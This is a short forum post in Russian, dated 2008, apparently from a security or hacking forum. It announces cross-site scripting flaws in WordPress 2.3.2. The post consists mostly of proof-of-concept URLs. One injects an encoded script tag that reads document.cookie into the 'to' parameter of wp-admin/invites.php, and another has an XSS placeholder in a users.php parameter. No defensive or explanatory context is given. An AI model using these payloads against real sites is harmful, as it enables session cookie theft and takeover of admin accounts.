10.03.2008, 17:06
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
WordPress Multiple Cross-Site Scripting Vulnerabilities
XSS
Vulnerable: 2.3.2
PoC:
Код:
http://site.wordpress.com/wp-admin/users.php?update=invite&inviteemail=[XSS C0d3]
http://site.wordpress.com/wp-admin/invites.php?result=sent&to=%22%3E%
3Cscript%3Ealert (document.cookie);%3C/script%3E
|
|
|